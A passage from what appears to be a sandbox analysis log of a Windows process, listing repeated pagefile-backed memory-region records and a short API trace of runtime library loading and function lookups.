0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13139 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13140 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13141 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13142 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13143 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13144 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13145 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13146 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13147 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13148 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13149 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13150 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13151 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13152 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13153 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13154 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13155 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13156 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13157 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13158 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13159 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13160 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13161 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13162 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13163 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13213 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13214 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13215 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13216 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13217 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13218 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13219 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13220 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13221 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13222 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13223 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13224 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13225 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13226 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13227 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13228 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13229 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13230 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13231 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13232 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13233 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13234 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13235 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13236 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13237 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13238 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13239 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13240 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13241 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13242 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13243 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13244 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13245 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13246 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13247 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13248 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13249 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13250 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13251 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13252 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13253 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13254 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13255 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13256 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13257 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13258 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13259 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13322 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13323 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13324 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13325 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13326 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13327 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13328 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13329 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13330 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13331 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13332 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13333 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13334 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13335 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13336 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13337 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13338 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13339 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13340 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13341 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13342 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13343 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13344 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13345 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13346 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13347 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13348 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13349 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13350 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13351 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13352 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13353 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13354 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13355 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13356 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13357 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13358 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13359 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13360 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13361 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13362 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13363 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13364 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13365 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13366 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13367 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13368 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13369 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13370 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13371 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13372 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13373 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13374 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13375 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13376 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13436 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13437 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13438 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13439 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13440 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13441 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13442 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13443 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13444 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13445 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13446 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13447 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13448 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13449 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13450 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13451 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13452 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13453 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13454 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13455 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13456 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13457 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13458 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13459 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13460 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13461 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13462 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13463 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13464 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13465 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13466 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13467 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13468 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13469 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13470 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13471 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13472 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13473 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13474 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13475 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13476 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13477 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Thread: id = 206 os_tid = 0x12bc [0216.139] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0216.140] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0216.140] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0216.140] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0216.140] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0216.141] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0216.141] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0216.141] GetProcessHeap () returned 0x430000 [0216.141] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0216.142] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0216.142] GetLastError () returned 0x7e [0216.142] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsGetValue") returned 